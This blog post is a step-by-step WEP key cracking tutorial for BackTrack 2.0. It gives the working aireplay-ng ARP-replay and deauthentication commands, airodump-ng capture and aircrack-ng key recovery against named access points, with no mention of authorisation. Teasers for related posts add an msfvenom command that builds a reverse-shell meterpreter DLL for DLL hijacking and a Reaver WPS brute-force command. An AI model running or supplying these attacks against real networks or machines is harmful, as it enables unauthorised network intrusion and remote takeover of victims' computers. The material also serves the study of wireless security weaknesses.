WEP Crack using Backtrack 2.0 on VMware workstation

List of equipments require for WEP cracking
  • download a copy of Backtrack2.0 final from http://remote-exploit.org/backtrack.html
  • Wireless card( DLINK DWL-G122 USB wireless dongle)
    • rat2500 driver
  • airodump
  • aireplay
  • aircrack
Step 1
once Backtrack 2.0 ISO loaded up and login to the system do the following

open up the shell command type
ifconfig rausb0 up
(bring the USB wireless dongle interface online)

iwconfig rausb0 mode monitor
(set wireless interface to monitor mode so you can start packet sniffing)

go to Kmenu-Backtrack-Radio network analysis-802.11-Analyser click on Kismet
(To start sniffing near by wireless Access Point ,to get BSSID address and their channel)

write down your BSSID address and channel on the paper or notepad

start typing in the shell command aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:13:a3:87:02:ab rausb0
(to start sending arp request to generating data packets for ivs file)
-3=standard ARP-request replay
-b=bssid(target AP Mac address)
-h -source address (Mac address of the device connect to the target AP)
rausb0=interface

start typing in the shell command airodump-ng --ivs -w testing --channel 10 rausb0
(to start capture ivs files from the Access Point)
--ivs = capture only ivs packets
-w=name of the ivs file
--channel=channel of the target Access Point
rausb0=wireless interface

If the arp packet still running slow do deauthentication attack follow the following
start typing in the shell command aireplay-ng -0 rausb0 -a 00:16:B6:2E:C3:4E rausb0
-0=deauthenticate 1 or all stations
-a=bssid (target AP Mac address)
rausb0=interface


Let airodump-ng capture all the packets for about 30mins
for 128 bits encryption you need about 400,000 or 1,000,000 packets

Once you have enough packets run the following command for generating WEP encryption key

start typing aircrack-ng -0 -n 128 -f 4 test.ivs
-0= attack type
-n= wep key 64,128
-f= bruteforce fudge factor default is 2
If you have enough ivs packets you should see the wep key in just a mins
onces you got WEP key in HEX format you should know your way from there


HAPPY HACKING

Comments

Post a Comment

Popular posts from this blog

DLL Injection:DVTA Walk through

Image
Identify where the missing DLL will be launched when DVTA.exe runs  First of all, we need to launch DVTA.exe from the given path and, at the same time, launch Procmon on the windows machine with the admin user. Once the Procmon is launched, go to the menu Filter > Filter to add the DVTA.exe processor name like the following. We might want to add a few more in the filter to see only the specific path and the result status. Normally when performing DLL injection analysis, we need to look for the DLL that the application tries to load, and the result is always "Include Not Found"  Once applied the filter the following path looks to be interested for DLL injection Now we know the name of DLL that we want to hijack. So all we have to do is place our malicious DLL in that path and wait for victim to execute the application. We will be creating 64 bit payload with msfvenom.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.22.3 LPORT=4444 -f dll -o DWrite.dll Now we ne...
Read more

Cracking WPA / WPA 2 with Reaver (WPS brute forcing attack tool)

Requirements Alfa wireless USB network card model AWUS036NHR (must support packet injection) Make USB bootable Backtrack 5 R3 OS   Boot up Backtrack 5 R3 from the USB drive and type startx to get into GUI mode bring up Terminal session and type the following airmon-ng start wlan1 ( which create new virtual wireless interface called mon0) wash -i mon0 ( to find wireless AP that has WPS feature enabled) Pick any AP you want and run the following command from the terminal session reaver -i mon0 -b<bssid of the AP> -c <channel> -a -L -vv wait for 2 to 3 hr before reaver guess the target AP Passphrase.
Read more

Basic Computer security for Home Users

To protect your home PC against spy ware, viruses, Trojan, keylogger, and any malicious programs you need to follow the following steps Do not use internet explorer to surf the net use "Firefox 2.0" instead. you can download FREE version of Firefox 2.0 from www.mozilla.org/firefox. internet explorer has the biggest security vulnerability. Every computer that connects to the internet in any form MUST have a personal firewall. RECOMMENT PRODUCT Zonealarm personal firewall,symantec internet security, Trend Micro 2007, Every computer must have virus protection and it must be kept current. RECOMMENT PRODUCT Northern Antivirus, McAfee antivirus,AVG free anti virus(can be download from http://free.grisoft.com/freeweb.php/doc/20/lng/us/tpl/v5), Only open e-mail attachments when you are sure the sender is really who it appears to be Operate at least one anti-spyware/anti-adware program on your system. RECOMMENT PRODUCT Ad-aware personal edition (http://www.lavasoftusa.com/pr...
Read more